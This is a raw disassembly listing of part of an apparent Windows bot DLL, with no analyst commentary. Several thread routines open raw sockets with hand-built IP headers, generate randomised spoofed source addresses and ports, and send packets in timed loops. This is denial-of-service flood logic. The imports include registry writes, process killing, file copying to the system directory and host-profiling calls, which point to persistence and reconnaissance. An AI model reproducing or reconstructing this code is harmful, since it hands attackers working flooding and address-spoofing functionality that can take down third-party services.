; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B0AF proc near ; CODE XREF: sub_1000B0A0+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D159
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_1000B0AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B0BF proc near ; CODE XREF: sub_1000B0A0+8�p
push ebp
mov ebp, esp
push offset sub_1000B0D1 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000B0BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000B0D1()
sub_1000B0D1 proc near ; DATA XREF: sub_1000B0BF+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D159
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_1000B0D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B0E1 proc near ; DATA XREF: .data:1000E070�o
push ebp
mov ebp, esp
call sub_1000B0F0
call sub_1000B100
pop ebp
retn
sub_1000B0E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B0F0 proc near ; CODE XREF: sub_1000B0E1+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_1002D158
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_1000B0F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B100 proc near ; CODE XREF: sub_1000B0E1+8�p
push ebp
mov ebp, esp
push offset sub_1000B112 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_1000B100 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_1000B112()
sub_1000B112 proc near ; DATA XREF: sub_1000B100+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_1002D158
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_1000B112 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000B122 proc near ; CODE XREF: sub_1000B205+178�p
; sub_1000B442+1C8�p ...
cp = byte ptr -20h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
lea eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_C]
push ecx
lea edx, [ebp+var_8]
push edx
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D_7 ; "%d.%d.%d.%d"
push offset byte_1002C5D8 ; Src
call ds:sscanf ; sscanf
add esp, 18h
loc_1000B14B: ; CODE XREF: sub_1000B122+CF�j
mov ecx, [ebp+arg_0]
and ecx, 0FFh
test ecx, ecx
jz short loc_1000B1AE
push 0FFh
push 0
call sub_10004608
add esp, 8
push eax
push 0FFh
push 0
call sub_10004608
add esp, 8
push eax
push 0FFh
push 0
call sub_10004608
add esp, 8
push eax
push 0FFh
push 0
call sub_10004608
add esp, 8
push eax
push offset aD_D_D_D_8 ; "%d.%d.%d.%d"
push 10h ; Count
lea edx, [ebp+cp]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
jmp short loc_1000B1DE
; ---------------------------------------------------------------------------
loc_1000B1AE: ; CODE XREF: sub_1000B122+34�j
push 0FFh
push 0
call sub_10004608
add esp, 8
push eax
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_4]
push edx
push offset aD_D_D_D_9 ; "%d.%d.%d.%d"
push 10h ; Count
lea eax, [ebp+cp]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
loc_1000B1DE: ; CODE XREF: sub_1000B122+8A�j
lea ecx, [ebp+cp]
push ecx ; Str2
push offset byte_1002C5D8 ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jz loc_1000B14B
lea edx, [ebp+cp]
push edx ; cp
call ds:inet_addr ; inet_addr
mov esp, ebp
pop ebp
retn
sub_1000B122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_1000B205(LPVOID)
sub_1000B205 proc near ; DATA XREF: sub_10007424+1127�o
s = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
optval = byte ptr -2C8h
var_2C4 = dword ptr -2C4h
to = sockaddr ptr -2C0h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
name = byte ptr -2A4h
var_224 = byte ptr -224h
buf = byte ptr -21Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
push esi
push edi
mov dword ptr [ebp+optval], 1
mov esi, [ebp+arg_0]
mov ecx, 24h
lea edi, [ebp+var_2AC]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_2C4], eax
mov ecx, [ebp+var_2C4]
mov byte ptr [ecx+89h], 1
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
lea edx, [ebp+name]
push edx ; Src
call sub_10004BF7
add esp, 4
and eax, 0FFh
test eax, eax
jz short loc_1000B27D
lea eax, [ebp+name]
push eax ; cp
call ds:inet_addr ; inet_addr
mov [ebp+var_2D0], eax
jmp short loc_1000B292
; ---------------------------------------------------------------------------
loc_1000B27D: ; CODE XREF: sub_1000B205+61�j
lea ecx, [ebp+name]
push ecx ; name
call sub_10004763
add esp, 4
mov [ebp+var_2D0], eax
loc_1000B292: ; CODE XREF: sub_1000B205+76�j
cmp [ebp+var_2D0], 0
jnz short loc_1000B2A3
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B2A3: ; CODE XREF: sub_1000B205+94�j
push 0 ; protocol
push 3 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_1000B2D7
push 1
mov edx, [ebp+var_2AC]
push edx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B2D7: ; CODE XREF: sub_1000B205+B7�j
push 4 ; optlen
lea eax, [ebp+optval]
push eax ; optval
push 2 ; optname
push 0 ; level
mov ecx, [ebp+s]
push ecx ; s
call ds:setsockopt ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_1000B31C
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
push 1
mov eax, [ebp+var_2AC]
push eax
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B31C: ; CODE XREF: sub_1000B205+EF�j
mov [ebp+to.sa_family], 2
mov word ptr [ebp+to.sa_data], 0
mov ecx, [ebp+var_2D0]
mov dword ptr [ebp+to.sa_data+2], ecx
push 8 ; Size
push 0 ; Val
lea edx, [ebp+to.sa_data+6]
push edx ; Dst
call memset ; memset
add esp, 0Ch
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_2CC], eax
loc_1000B362: ; CODE XREF: sub_1000B205:loc_1000B40F�j
mov edx, 1
test edx, edx
jz loc_1000B414
mov eax, [ebp+var_2D0]
push eax
mov cl, [ebp+var_224]
push ecx
call sub_1000B122
add esp, 4
push eax
lea edx, [ebp+buf]
push edx
call sub_10006A3B
add esp, 0Ch
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 21Ch ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1000B3E4
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp+var_2AC]
push ecx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B3E4: ; CODE XREF: sub_1000B205+1B7�j
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
sub eax, [ebp+var_2CC]
mov [ebp+var_2B0], eax
mov edx, [ebp+var_2B0]
cmp edx, [ebp+var_2A8]
jl short loc_1000B40F
jmp short loc_1000B414
; ---------------------------------------------------------------------------
loc_1000B40F: ; CODE XREF: sub_1000B205+206�j
jmp loc_1000B362
; ---------------------------------------------------------------------------
loc_1000B414: ; CODE XREF: sub_1000B205+164�j
; sub_1000B205+208�j
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp+var_2AC]
push ecx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_1000B205 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_1000B442(LPVOID)
sub_1000B442 proc near ; DATA XREF: sub_10007424+1281�o
var_2D8 = word ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
name = byte ptr -2CAh
var_24A = byte ptr -24Ah
s = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
optval = byte ptr -238h
var_234 = dword ptr -234h
to = sockaddr ptr -230h
var_220 = dword ptr -220h
buf = byte ptr -21Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D8h
push esi
push edi
mov dword ptr [ebp+optval], 1
mov esi, [ebp+arg_0]
mov ecx, 24h
lea edi, [ebp+var_2D4]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_234], eax
mov ecx, [ebp+var_234]
mov byte ptr [ecx+8Bh], 1
call ds:GetTickCount ; GetTickCount
push eax ; Seed
call ds:srand ; srand
add esp, 4
lea edx, [ebp+name]
push edx ; Src
call sub_10004BF7
add esp, 4
and eax, 0FFh
test eax, eax
jz short loc_1000B4BA
lea eax, [ebp+name]
push eax ; cp
call ds:inet_addr ; inet_addr
mov [ebp+var_240], eax
jmp short loc_1000B4CF
; ---------------------------------------------------------------------------
loc_1000B4BA: ; CODE XREF: sub_1000B442+61�j
lea ecx, [ebp+name]
push ecx ; name
call sub_10004763
add esp, 4
mov [ebp+var_240], eax
loc_1000B4CF: ; CODE XREF: sub_1000B442+76�j
cmp [ebp+var_240], 0
jnz short loc_1000B4E0
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B4E0: ; CODE XREF: sub_1000B442+94�j
push 0 ; protocol
push 3 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_1000B514
push 1
mov edx, [ebp+var_2D4]
push edx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B514: ; CODE XREF: sub_1000B442+B7�j
push 4 ; optlen
lea eax, [ebp+optval]
push eax ; optval
push 2 ; optname
push 0 ; level
mov ecx, [ebp+s]
push ecx ; s
call ds:setsockopt ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_1000B559
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
push 1
mov eax, [ebp+var_2D4]
push eax
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B559: ; CODE XREF: sub_1000B442+EF�j
mov [ebp+to.sa_family], 2
mov word ptr [ebp+to.sa_data], 0
mov ecx, [ebp+var_240]
mov dword ptr [ebp+to.sa_data+2], ecx
push 8 ; Size
push 0 ; Val
lea edx, [ebp+to.sa_data+6]
push edx ; Dst
call memset ; memset
add esp, 0Ch
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_23C], eax
loc_1000B59F: ; CODE XREF: sub_1000B442:loc_1000B69C�j
mov edx, 1
test edx, edx
jz loc_1000B6A1
mov eax, [ebp-2CCh]
and eax, 0FFFFh
test eax, eax
jz short loc_1000B5CF
mov ecx, [ebp-2CCh]
and ecx, 0FFFFh
mov dword ptr [ebp+var_2D8], ecx
jmp short loc_1000B5E4
; ---------------------------------------------------------------------------
loc_1000B5CF: ; CODE XREF: sub_1000B442+177�j
push 0FFFFh
push 1
call sub_10004608
add esp, 8
mov dword ptr [ebp+var_2D8], eax
loc_1000B5E4: ; CODE XREF: sub_1000B442+18B�j
mov dx, [ebp+var_2D8]
push edx ; __int16
push 0FFFFh
push 1
call sub_10004608
add esp, 8
push eax ; hostshort
mov eax, [ebp+var_240]
push eax ; int
mov cl, [ebp+var_24A]
push ecx
call sub_1000B122
add esp, 4
push eax ; int
lea edx, [ebp+buf]
push edx ; int
call sub_10006BAC
add esp, 14h
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 21Ch ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1000B671
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp+var_2D4]
push ecx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B671: ; CODE XREF: sub_1000B442+207�j
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
sub eax, [ebp+var_23C]
mov [ebp+var_220], eax
mov edx, [ebp+var_220]
cmp edx, [ebp+var_2D0]
jl short loc_1000B69C
jmp short loc_1000B6A1
; ---------------------------------------------------------------------------
loc_1000B69C: ; CODE XREF: sub_1000B442+256�j
jmp loc_1000B59F
; ---------------------------------------------------------------------------
loc_1000B6A1: ; CODE XREF: sub_1000B442+164�j
; sub_1000B442+258�j
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp+var_2D4]
push ecx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_1000B442 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0E4h
push esi
push edi
mov dword ptr [ebp-0D0h], 1
mov esi, [ebp+8]
mov ecx, 24h
lea edi, [ebp-0CCh]
rep movsd
mov eax, [ebp+8]
mov [ebp-0D4h], eax
mov ecx, [ebp-0D4h]
mov byte ptr [ecx+8Bh], 1
call ds:GetTickCount ; GetTickCount
push eax
call ds:srand ; srand
add esp, 4
lea edx, [ebp-0C2h]
push edx
call sub_10004BF7
add esp, 4
and eax, 0FFh
test eax, eax
jz short loc_1000B747
lea eax, [ebp-0C2h]
push eax
call ds:inet_addr ; inet_addr
mov [ebp-0DCh], eax
jmp short loc_1000B75C
; ---------------------------------------------------------------------------
loc_1000B747: ; CODE XREF: .text:1000B730�j
lea ecx, [ebp-0C2h]
push ecx
call sub_10004763
add esp, 4
mov [ebp-0DCh], eax
loc_1000B75C: ; CODE XREF: .text:1000B745�j
cmp dword ptr [ebp-0DCh], 0
jnz short loc_1000B76D
push 0
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B76D: ; CODE XREF: .text:1000B763�j
push 0
push 3
push 2
call ds:socket ; socket
mov [ebp-0E0h], eax
cmp dword ptr [ebp-0E0h], 0FFFFFFFFh
jnz short loc_1000B7A1
push 1
mov edx, [ebp-0CCh]
push edx
call sub_1000AB26
add esp, 8
push 0
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B7A1: ; CODE XREF: .text:1000B786�j
push 4
lea eax, [ebp-0D0h]
push eax
push 2
push 0
mov ecx, [ebp-0E0h]
push ecx
call ds:setsockopt ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_1000B7E6
mov edx, [ebp-0E0h]
push edx
call ds:closesocket ; closesocket
push 1
mov eax, [ebp-0CCh]
push eax
call sub_1000AB26
add esp, 8
push 0
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B7E6: ; CODE XREF: .text:1000B7BE�j
mov word ptr [ebp-3Ch], 2
mov word ptr [ebp-3Ah], 0
mov ecx, [ebp-0DCh]
mov [ebp-38h], ecx
push 8
push 0
lea edx, [ebp-34h]
push edx
call memset ; memset
add esp, 0Ch
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp-0D8h], eax
loc_1000B820: ; CODE XREF: .text:loc_1000B908�j
mov edx, 1
test edx, edx
jz loc_1000B90D
mov eax, [ebp-0C4h]
and eax, 0FFFFh
test eax, eax
jz short loc_1000B850
mov ecx, [ebp-0C4h]
and ecx, 0FFFFh
mov [ebp-0E4h], ecx
jmp short loc_1000B865
; ---------------------------------------------------------------------------
loc_1000B850: ; CODE XREF: .text:1000B83A�j
push 0FFFFh
push 1
call sub_10004608
add esp, 8
mov [ebp-0E4h], eax
loc_1000B865: ; CODE XREF: .text:1000B84E�j
mov dx, [ebp-0E4h]
push edx
push 0FFFFh
push 1
call sub_10004608
add esp, 8
push eax
mov eax, [ebp-0DCh]
push eax
mov cl, [ebp-42h]
push ecx
call sub_1000B122
add esp, 4
push eax
lea edx, [ebp-28h]
push edx
call sub_10006D53
add esp, 14h
push 10h
lea eax, [ebp-3Ch]
push eax
push 0
push 28h
lea ecx, [ebp-28h]
push ecx
mov edx, [ebp-0E0h]
push edx
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1000B8E3
mov eax, [ebp-0E0h]
push eax
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp-0CCh]
push ecx
call sub_1000AB26
add esp, 8
push 0
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_1000B8E3: ; CODE XREF: .text:1000B8BB�j
call ds:GetTickCount ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
sub eax, [ebp-0D8h]
mov [ebp-2Ch], eax
mov edx, [ebp-2Ch]
cmp edx, [ebp-0C8h]
jl short loc_1000B908
jmp short loc_1000B90D
; ---------------------------------------------------------------------------
loc_1000B908: ; CODE XREF: .text:1000B904�j
jmp loc_1000B820
; ---------------------------------------------------------------------------
loc_1000B90D: ; CODE XREF: .text:1000B827�j
; .text:1000B906�j
mov eax, [ebp-0E0h]
push eax
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp-0CCh]
push ecx
call sub_1000AB26
add esp, 8
push 0
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
align 4
; [00000006 BYTES: COLLAPSED FUNCTION __WSAFDIsSet. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _ftol. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_1000B966: ; CODE XREF: .text:1000BC77�j
jmp ds:__CxxFrameHandler
; [0000002C BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcmp. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __aullrem. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcat. PRESS KEYPAD "+" TO EXPAND]
; [000000AB BYTES: COLLAPSED FUNCTION _CRT_INIT(x,x,x). PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION DllEntryPoint. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION __dllonexit. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION Process32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_1000BC50 proc near ; DATA XREF: .rdata:stru_1000CDF8�o
lea ecx, [ebp-20h]
call ds:??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string<char,std::char_traits<char>,std::allocator<char>>(void)
retn
sub_1000BC50 endp
; =============== S U B R O U T I N E =======================================
sub_1000BC5A proc near ; DATA XREF: .rdata:stru_1000CDF8�o
mov eax, [ebp-3Ch]
and eax, 1
test eax, eax
jz locret_1000BC71
mov ecx, [ebp+8]
call ds:??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string<char,std::char_traits<char>,std::allocator<char>>(void)
locret_1000BC71: ; CODE XREF: sub_1000BC5A+8�j
retn
sub_1000BC5A endp
; ---------------------------------------------------------------------------
loc_1000BC72: ; DATA XREF: .text:10001CC6�o
mov eax, offset stru_1000CDF8
jmp loc_1000B966
; ---------------------------------------------------------------------------
align 400h
_text ends
; Section 2. (virtual address 0000C000)
; Virtual size : 00001961 ( 6497.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0000C000
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; LSTATUS __stdcall RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,const BYTE *lpData,DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_10004DB1+D0�p
; DATA XREF: sub_10004DB1+D0�r
; LSTATUS __stdcall RegDeleteValueA(HKEY hKey,LPCSTR lpValueName)
extrn RegDeleteValueA:dword ; CODE XREF: sub_10004EA7+E0�p
; DATA XREF: sub_10004EA7+E0�r
; LSTATUS __stdcall RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,const LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition)
extrn RegCreateKeyExA:dword ; CODE XREF: sub_10004DB1+A1�p
; sub_10004EA7+CC�p
; DATA XREF: ...
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_10004DB1+DD�p
; DATA XREF: sub_10004DB1+DD�r
; BOOL __stdcall GetUserNameA(LPSTR lpBuffer,LPDWORD pcbBuffer)
extrn GetUserNameA:dword ; CODE XREF: sub_10004987+183�p
; DATA XREF: sub_10004987+183�r
;
; Imports from KERNEL32.dll
;
; HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID)
extrn __imp_CreateToolhelp32Snapshot:dword
; DATA XREF: CreateToolhelp32Snapshot�r
; BOOL __stdcall Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
extrn __imp_Process32First:dword ; DATA XREF: Process32First�r
; BOOL __stdcall Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe)
extrn __imp_Process32Next:dword ; DATA XREF: Process32Next�r
; BOOL __stdcall DeleteFileA(LPCSTR lpFileName)
extrn DeleteFileA:dword ; CODE XREF: sub_10007424+DC9�p
; DATA XREF: sub_10007424+DC9�r
; int __stdcall GetLocaleInfoA(LCID Locale,LCTYPE LCType,LPSTR lpLCData,int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: sub_10007424+1C61�p
; DATA XREF: sub_10007424+1C61�r
; UINT __stdcall GetTempFileNameA(LPCSTR lpPathName,LPCSTR lpPrefixString,UINT uUnique,LPSTR lpTempFileName)
extrn GetTempFileNameA:dword ; CODE XREF: .text:1000595B�p
; sub_10007424+232B�p
; DATA XREF: ...
; DWORD __stdcall GetTempPathA(DWORD nBufferLength,LPSTR lpBuffer)
extrn GetTempPathA:dword ; CODE XREF: sub_10004EA7+27�p
; .text:10005940�p ...
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: sub_10004EA7+16C�p
; sub_10005380+FC�p
; DATA XREF: ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName,DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: sub_10004DB1+EC�p
; sub_10004EA7+F2�p
; DATA XREF: ...
; BOOL __stdcall CopyFileA(LPCSTR lpExistingFileName,LPCSTR lpNewFileName,BOOL bFailIfExists)
extrn CopyFileA:dword ; CODE XREF: sub_10004CE4+6A�p
; DATA XREF: sub_10004CE4+6A�r
; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: sub_10009949+24�p
; sub_1000998F+A4�p
; DATA XREF: ...
; void __stdcall GlobalMemoryStatus(LPMEMORYSTATUS lpBuffer)
extrn GlobalMemoryStatus:dword ; CODE XREF: sub_10004987+44�p
; DATA XREF: sub_10004987+44�r
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: sub_10004987+5B�p
; sub_10007005+32�p ...
; BOOL __stdcall GetComputerNameA(LPSTR lpBuffer,LPDWORD nSize)
extrn GetComputerNameA:dword ; CODE XREF: sub_10004987+169�p
; sub_10007424+1A87�p
; DATA XREF: ...
; UINT __stdcall SetErrorMode(UINT uMode)
extrn SetErrorMode:dword ; CODE XREF: start+E7�p
; DATA XREF: start+E7�r
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: start+ED�p
; sub_10004987:loc_10004AD3�p ...
; HANDLE __stdcall CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes,BOOL bInitialOwner,LPCSTR lpName)
extrn CreateMutexA:dword ; CODE XREF: start+11A�p
; DATA XREF: start+11A�r
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle,DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: start+121�p
; DATA XREF: start+121�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: DllMain(x,x,x)+1E�p
; DATA XREF: DllMain(x,x,x)+1E�r
; int __stdcall GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)
extrn GetDateFormatA:dword ; CODE XREF: StartAddress+C3�p
; DATA XREF: StartAddress+C3�r
; int __stdcall GetTimeFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpTime,LPCSTR lpFormat,LPSTR lpTimeStr,int cchTime)
extrn GetTimeFormatA:dword ; CODE XREF: StartAddress+E0�p
; DATA XREF: StartAddress+E0�r
; HANDLE __stdcall OpenProcess(DWORD dwDesiredAccess,BOOL bInheritHandle,DWORD dwProcessId)
extrn OpenProcess:dword ; CODE XREF: sub_10009949+F�p
; sub_1000998F+95�p
; DATA XREF: ...
; BOOL __stdcall TerminateThread(HANDLE hThread,DWORD dwExitCode)
extrn TerminateThread:dword ; CODE XREF: sub_1000A8D0+C6�p
; sub_1000AA09+6D�p
; DATA XREF: ...
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_10002157+302�p
; sub_100030D9+1BA�p ...
; HANDLE __stdcall CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId)
extrn CreateThread:dword ; CODE XREF: sub_10002157+323�p
; sub_10007424+1133�p ...
; UINT __stdcall GetSystemDirectoryA(LPSTR lpBuffer,UINT uSize)
extrn GetSystemDirectoryA:dword ; CODE XREF: sub_10004987+3A�p
; sub_10004CE4+15�p ...
; void __stdcall ExitThread(DWORD dwExitCode)
extrn ExitThread:dword ; CODE XREF: sub_1000329E+75C�p
; StartAddress+2BC�p ...
; DWORD __stdcall SetFilePointer(HANDLE hFile,LONG lDistanceToMove,PLONG lpDistanceToMoveHigh,DWORD dwMoveMethod)
extrn SetFilePointer:dword ; CODE XREF: sub_100030D9+133�p
; sub_10005AE8+BD�p
; DATA XREF: ...
; BOOL __stdcall ReadFile(HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead,LPOVERLAPPED lpOverlapped)
